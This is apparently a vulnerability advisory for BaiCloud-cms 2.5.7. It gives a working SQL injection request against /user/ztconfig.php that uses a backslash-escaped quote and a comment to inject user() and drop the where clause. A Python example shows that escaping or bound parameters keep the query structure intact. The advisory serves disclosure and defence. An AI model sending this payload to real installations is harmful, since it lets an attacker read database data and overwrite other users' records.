BaiCloud
BaiCloud-cms 2.5.7 /user/ztconfig.php SQL injection Vulnerability
Link Url : https://github.com/meiko-S/BaiCloud
Edition : latest (2.5.7)
0x01 Vulnerability (/user/ztconfig.php line 65)
After logging in as a user, send the following POST request:
POST /user/ztconfig.php
tongji=1\&baidu_map=,baidu_map=user()#&action=modify&bannerheight=1
Then request the /user/ztconfig.php page with GET; the result is shown on the page.

0x20 Analysis
We set tongji=1\ and baidu_map=,baidu_map=user()# so the query becomes:
update zzcms_usersetting set comanestyle='',comanecolor='',swf='',daohang='',bannerbg='',bannerheight='1',mobile='0',tongji='1\',baidu_map=',baidu_map=user()#' where username='admin';
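This is a valid SQL statement: the trailing backslash in tongji escapes that value's closing quote, so the string literal runs on to the opening quote of baidu_map, the text after it is parsed as a column assignment, and # comments out the rest of the statement, including the where clause.
When this page is requested afterwards, the stored value is displayed.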
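
The analysis above can be checked mechanically. This is an added example, not code from BaiCloud or from the advisory's author: it rebuilds the statement by string concatenation, reduces it to its structure under MySQL's default literal rules, and compares that with the intended structure, with and without escaping. The template, the function names and the simplified escaping model are assumptions; only the column names and the two POST values come from the page.

```python
# Added example: column names come from the query in the advisory; the template,
# function names and the escaping model are assumptions, not BaiCloud source code.
TEMPLATE = ("update zzcms_usersetting set comanestyle='',comanecolor='',swf='',"
            "daohang='',bannerbg='',bannerheight='1',mobile='0',"
            "tongji='{tongji}',baidu_map='{baidu_map}' where username='admin';")
EXPECTED = ("update zzcms_usersetting set comanestyle=?,comanecolor=?,swf=?,"
            "daohang=?,bannerbg=?,bannerheight=?,mobile=?,"
            "tongji=?,baidu_map=? where username=?;")

def mysql_escape(value):
    """Simplified model of MySQL string escaping: backslash first, then quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

def build_query(tongji, baidu_map, escape=lambda v: v):
    """Concatenate request values into the statement (identity escape = vulnerable)."""
    return TEMPLATE.format(tongji=escape(tongji), baidu_map=escape(baidu_map))

def skeleton(sql):
    """SQL with each string literal replaced by ? and # comments dropped,
    following MySQL's default rules (backslash escapes the next character)."""
    out, i, in_str = [], 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\" or sql[i:i + 2] == "''":
                i += 2            # escaped character or doubled quote stays in the literal
                continue
            if c == "'":
                in_str = False
                out.append("?")
        elif c == "'":
            in_str = True
        elif c == "#":
            end = sql.find("\n", i)
            i = len(sql) if end == -1 else end
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)

# Values from the advisory's POST body (tongji ends in a single backslash).
TONGJI, BAIDU_MAP = "1\\", ",baidu_map=user()#"
VULNERABLE = skeleton(build_query(TONGJI, BAIDU_MAP))
ESCAPED = skeleton(build_query(TONGJI, BAIDU_MAP, mysql_escape))

if __name__ == "__main__":
    print("concatenated:", VULNERABLE)
    print("escaped:     ", ESCAPED, "| intact:", ESCAPED == EXPECTED)
```

With plain concatenation the structure ends in baidu_map=user() and the where clause is gone; with the backslash escaped, both values stay inside their literals. A prepared statement with bound parameters achieves the same result without relying on escaping at all.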